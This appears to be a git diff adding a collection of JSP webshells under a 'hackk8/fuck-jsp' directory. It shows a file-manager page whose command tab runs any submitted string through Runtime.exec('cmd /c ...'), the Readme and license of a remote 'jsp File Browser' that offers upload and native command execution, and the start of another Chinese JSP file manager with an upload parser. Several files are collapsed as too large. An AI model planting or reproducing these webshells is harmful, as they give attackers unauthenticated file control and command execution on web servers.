document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("确定要删除文件 "+file+" 吗?"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>index</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>操作失败: "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; 未完成
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+" <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
总计文件个数:<font color="#FF0000">30</font> ,大小:<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="新建目录" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="上传">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center>

1811
jsp/hackk8/fuck-jsp/job.jsp Normal file
View file

File diff suppressed because it is too large Load diff

2344
jsp/hackk8/fuck-jsp/jspbrowser/1.jsp Normal file
View file

File diff suppressed because it is too large Load diff

1778
jsp/hackk8/fuck-jsp/jspbrowser/2.jsp Normal file
View file

File diff suppressed because it is too large Load diff

1934
jsp/hackk8/fuck-jsp/jspbrowser/Browser.jsp Normal file
View file

File diff suppressed because it is too large Load diff

279
jsp/hackk8/fuck-jsp/jspbrowser/Readme.txt Normal file
View file

@ -0,0 +1,279 @@
jsp File Browser version 1.2
--------------------------------------------------------------------------------------
------------------------IMPORTANT
With this jsp you can destroy important files on your system, it also could be
a serious security hole on your server.
Use this script only, if you know what you do. There is no warranty of any kind.
------------------------REQUIREMENTS
To use the File browser, you need a JSP1.1 compatible Web Server like Tomcat, Resin
or Jetty.
If you use the browser on webspace provided by an internet service provider,
it could be, that you are not allowed to go in some directories or execute
commands on the server, this will result in an exception.
------------------------INSTALLATION
Just copy the jsp file to any configured Web application. The author recommends to
protect the directory you copy the file into by password, to avoid abuse.
------------------------SETTINGS
If you want to change the standard style, you can create a css file in the directory
where Browser.jsp is located with the name "Browser.css". If you want choose another name
change this line in Browser.jsp:
private static final String CSS_NAME = "Browser.css";
For the syntax, look at the example css file.
If you click on a filename, the file will be opened in an new window. If you want that file
opened in your current window, change this line:
private static final boolean USE_POPUP = true;
to
private static final boolean USE_POPUP = false;
If you hold the mouse cursor over a directory name, a tooltip with
the first ten entries of this directory show up. This feature can lead to performance issues. If
you observe slow loading times you should change this line:
private static final boolean USE_DIR_PREVIEW = true;
to
private static final boolean USE_DIR_PREVIEW = false;
You could also change the number of entries in the preview by changing this line:
private static final int DIR_PREVIEW_NUMBER = 10;
If you would like to execute commands on the server, you have to specify a
command line interpreter and the parameter to execute a command.
This is the parameter for windows:
private static final String[] COMMAND_INTERPRETER = {"cmd","/C"};
The maximum time in ms a command is allowed to run before it will be terminated is specified
by this line:
private static final long MAX_PROCESS_RUNNING_TIME = 30000;
You can restrict file browsing and manipulation by setting
private static final boolean RESTRICT_BROWSING = true;
You can choose between whitelist restriction, that means the user is allowed to browse only in
directories, which are lower than RESTRICT_PATH, or blacklist restriction, which allows
the user to access all directories besides RESTRICT_PATH.
private static final boolean RESTRICT_WHITELIST = true;
You can set more than one directory in RESTRICT_PATH, seperated by semicolon.
It is also possible to make the file browser read-only. All operations which change the
file structure (besides upload and native command execution) are forbidden and turned off.
To achieve this change
private static final boolean READ_ONLY = false;
to
private static final boolean READ_ONLY = true;
.
You can also turn off upload with
private static final boolean ALLOW_UPLOAD = false; .
If you restrict file access it is also recommend to forbid native command execution by
changing
private static final boolean NATIVE_COMMANDS = true;
to
private static final boolean NATIVE_COMMANDS = false;
.
------------------------USAGE
This JSP program allows remote web-based file access and manipulation.
You can copy, create, move, rename and delete files.
Text files can be edited and groups of files and folders can be downloaded
as a single zip file that is created on the fly.
http://server/webapp/Browser.jsp
or
http://server/webapp/Browser.jsp?dir=[Directory on the server]
You do not need a javascript capable browser, but it looks nicer with it.
If you want to copy or move a file, please enter the target directory name in the
edit field (absolute or relative). If you want to create a new file or directory,
enter the name in the edit field.
If you click on a header name (e.g. size) the entries will be sorted by this property.
If you click two times, they will be sorted descending.
The button "Download as zip" let you download the selected directories and files packed as
one zip file.
The buttons "Delete Files", "Move Files", "Copy Files", delete, move and copy also selected
directories with subdirectories.
If you click on a .zip or .jar filename, you will see the entries of the packed file.
You can unpack .zip, .jar and .gz direct on the server. For this filetype the entry in the
last column is "Unpack". If you click at the "Unpack" link, the file will be unpacked in
the current folder. Note, that you can only unpack a file, if no entry of the packed file
already exist in the directory (no overwriting). If you want to unpack this file, you have
to delete the files on the server which correspond to the entries. This feature is very useful,
if you would like to upload more than one file. Zip the files together on your computer,
then upload the zip file and extract it on the server.
You can execute commands on the server (if you are allowed to) by clicking the "Launch command"
button, but beware that you cannot interact with the program. If the execution time of the program
is longer than MAX_PROCESS_RUNNING_TIME (standard: 30 sec.) the program will be killed.
If you click on a file, it will be shown, if the MIME Type is supported.
The following MIME Types are supported:
.png image/png
.jpg, .jpeg image/jpeg
.gif image/gif
.tiff image/tiff
.svg image/svg+xml
.pdf application/pdf
.htm, .html, .shtml text/html
.xml text/xml
.avi video/x-msvideo
.mov video/quicktime
.mpg, .mpeg, .mpe video/mpeg
.rtf application/rtf
.mid, .midi, audio/x-midi
.xl,.xls,.xlv,.xla,.xlb,.xlt,.xlm,.xlk application/excel
.doc, .dot application/msword
.mp3 audio/mp3
.ogg audio/ogg
else text/plain
------------------------SHORTKEYS
You can use the following shortkeys for better handling:
r Rename file
m Move file
y Copy file
Del Delete file
l Launch command
z Download selected files as zip
c Create file
d Create directory
------------------------KNOWN BUGS
The JVM from windows will sometimes displays a message box on the server,
if you try to access an empty removable drive. There will be no respond from
the server until the message box is closed.
If someone knows how to fix this, please write me a mail.
Removable drives will not be shown on the list, if you add them to this
property:
private static final String[] FORBIDDEN_DRIVES= {"a:\\"}
like e.g.
private static final String[] FORBIDDEN_DRIVES= {"a:\\", "d:\\", "e:\\"}
------------------------CONTACT
Boris von Loesch
boris@vonloesch.de
------------------------CHANGELOG
1.2 (21.07.2006)
- Shortkeys
- Filter file table
- Fix a bug which appears with Tomcat
- Add parameter to turn jsp filebrowser to a read-only version
- Add parameter to disallow uploads (even in the read-only version)
- Nicer layout
- Javascript will now be cached by the browser therefore smaller page size
- Turned off directory preview by default, because it uses too much resources
1.1a (27.08.2004)
- killed a bug, which appears if you view or download files
- fix upload time display
1.1 (20.08.2004)
- Upload monitor
- Restrict file access
1.0 (13.04.2004)
- if you click two times on a table header, it will be sorted descending
- sort parameter is memorized
- bugfixes (14,11,15)
- added some mime types
1.0RC2 (02.02.2004)
- only bugfixes (3,4,6,9)
1.0RC1 (17.11.2003)
Thanks to David Cowan for code contribution (buffering), bug fixing and testing
- execute native shell commands
- quick change to lower directories paths
- solve homepath problem with Oracle oc4j
- remove two bugs in the upload routine
- add war file unpack and view support
- remove some html errors (page is now valid HTML 4.1 Transitional)
- add buffering for download of files and zip file creation, this increases the speed
0.6 (14.10.2003)
Thanks to David Levine for bug fixes
- Refactor parts of the code
- Viewing and unpacking of .zip, .jar and .gz files on the server
- Customizable layout via external css file (optional)
- Distinction between error and success messages
- Open File in a new window
- "Select all" checkbox
- More options
- Some small changes and bugfixes
0.5 (20.08.2003)
Greetings to Taylor Bastien who contributed a lot of code for this release
- Renaming of files
- File extension in an extra column
- variable filesize unit (bytes, KB or MB)
- Directory preview via tooltip (simple hold the mousecursor over a directory name and
a tooltip with the first ten entries will appear)
- Summary (number and size of all files in the current directory)
- Text editor can save files with dos/windows or unix line ending
- many small changes
0.4 (17.05.2003)
- It does not longer need a temporary directory !
- Jsp 1.1 compatible (works now also in Tomcat 3)
- The file editor can now save the edited file with a new name and can make a backup
- selected row is marked by color and the checkbox can be selected by click at any place in the row
(works only with Javascript)
- some new MIME types (xml, png, svg)
- unreadable files and directories are marked (not selectable)
- write protected files and directories are marked (italic)
- if no dir parameter is assigned, the home directory of the browser will be displayed
- some bugs killed
0.3
- Output is HTML 4.01 conform, should now be netscape>4 compatible
- Messages to indicate the status of an operation
- Many bugs killed
- Tooltips
0.2
- First release
CREDITS
Taylor Bastien
David Levine
David Cowan
Lieven Govaerts
LICENSE
jsp File browser
Copyright (C) 2003-2006 Boris von Loesch
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your option)
any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the
Free Software Foundation, Inc.,
59 Temple Place, Suite 330,
Boston, MA 02111-1307 USA

50
jsp/hackk8/fuck-jsp/jspbrowser/example-css.css Normal file
View file

@ -0,0 +1,50 @@
input.button { background-color: #EF9C00;
color: #8C5900;
border: 2px outset #EF9C00; }
input.button:Hover { color: #444444 }
input { background-color:#FDEBCF;
border: 2px inset #FDEBCF }
table.filelist { background-color:#FDE2B8;
width:100%;
border:3px solid #ffffff }
th { background-color:#BC001D;
font-size: 10pt;
color:#022F55 }
tr.mouseout { background-color:#F5BA5C; }
tr.mouseout td {border:1px solid #F5BA5C;}
tr.mousein { background-color:#EF9C00; }
tr.mousein td { border-top:1px solid #3399ff;
border-bottom:1px solid #3399FF;
border-left:1px solid #EF9C00;
border-right:1px solid #EF9C00; }
tr.checked { background-color:#B57600 }
tr.checked td {border:1px solid #B57600;}
tr.mousechecked { background-color:#8C5900 }
tr.mousechecked td {border:1px solid #8C5900;}
td { font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 7pt;
color: #FFF5E8; }
td.message { background-color: #FFFF00;
color: #000000;
text-align:center;
font-weight:bold }
.formular {margin: 1px; background-color:#ffffff; padding: 1em; border:1px solid #000000;}
.formular2 {margin: 1px;}
A { text-decoration: none;
color: #005073
}
A:Hover { color : #022F55;
text-decoration : underline; }
BODY { font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 8pt;
color: #666666;
background-color: #FDE2B8;
}

222
jsp/hackk8/fuck-jsp/jspbrowser/gpl.txt Normal file
View file

@ -0,0 +1,222 @@
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS

1811
jsp/hackk8/fuck-jsp/ma1.jsp Normal file
View file

File diff suppressed because it is too large Load diff

807
jsp/hackk8/fuck-jsp/ma2.jsp Normal file
View file

@ -0,0 +1,807 @@
<%@ page import="java.util.*,java.net.*,java.text.*,java.util.zip.*,java.io.*"%>
<%@ page contentType="text/html;charset=gb2312"%>
<%!
/*
**************************************************************************************
*JSP 文件管理器 v1.001 *
*Copyright (C) 2003 by Bagheera *
*E-mail:bagheera@beareyes.com *
*QQ:179189585 *
*http://jmmm.com *
*------------------------------------------------------------------------------------*
*警告:请不要随便修改以上版权信息! *
**************************************************************************************
*#######免费空间管理系统正在完善之中,请到这里测试并发表宝贵意见: *
**http://jmmm.com/web/index.jsp 测试帐号:test 密码:test *
**************************************************************************************
*/
//编辑器显示列数
private static final int EDITFIELD_COLS =100;
//编辑器显示行数
private static final int EDITFIELD_ROWS = 30;
//-----------------------------------------------------------------------------
//改变上传文件是的缓冲目录(一般不需要修改)
private static String tempdir = ".";
public class FileInfo{
public String name = null,
clientFileName = null,
fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray){
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
public class HttpMultiPartParser{
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB=1024*1024*1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir)
throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1)
throw new IllegalArgumentException("boundary");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles=(saveInDir != null && saveInDir.trim().length() > 0),
isFile = false;
if (saveFiles){
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary))
throw new IOException("未发现;"
+" boundary = " + boundary
+", line = " + line);
while (line != null){
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException("出现错误!");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException("出现错误!");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException("出现错误!");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()){
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1){
if (stFields.nextToken().trim().equalsIgnoreCase("filename")){
fileInfo.name=paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0){
fileInfo.clientFileName=value;
isFile = true;
}
else{
line = getLine(is); // 去掉"Content-Type:"行
line = getLine(is); // 去掉空白行
line = getLine(is); // 去掉空白行
line = getLine(is); // 定位
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0){
line = getLine(is); // 去掉"Content-Type:"行
line = getLine(is); // 去掉空白行
line = getLine(is); // 去掉空白行
line = getLine(is); // 定位
continue;
}
}
boolean skipBlankLine = true;
if (isFile){
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else{
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2)
throw new IllegalArgumentException("出现错误!");
stLine.nextToken();
fileInfo.fileContentType=stLine.nextToken();
}
}
if (skipBlankLine){
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile){
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
//判断是否为目录
if (paramName.equals("dir")){
saveInDir = line;
System.out.println(line);
}
line = getLine(is);
continue;
}
try{
OutputStream os = null;
String path = null;
if (saveFiles)
os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent){
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
break;
}
if (compareBoundary(boundary, currentLine)){
os.write( previousLine, 0, read );
os.flush();
line = new String( currentLine, 0, read3 );
break;
}
else{
os.write( previousLine, 0, read );
os.flush();
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}
}
os.close();
temp = null;
previousLine = null;
currentLine = null;
if (!saveFiles){
ByteArrayOutputStream baos = (ByteArrayOutputStream)os;
fileInfo.setFileContents(baos.toByteArray());
}
else{
fileInfo.file = new File(path);
os = null;
}
dataTable.put(paramName, fileInfo);
}
catch (IOException e) {
throw e;
}
}
return dataTable;
}
// 比较数据
private boolean compareBoundary(String boundary, byte ba[]){
byte b;
if (boundary == null || ba == null) return false;
for (int i=0; i < boundary.length(); i++)
if ((byte)boundary.charAt(i) != ba[i]) return false;
return true;
}
private synchronized String getLine(ServletInputStream sis) throws IOException{
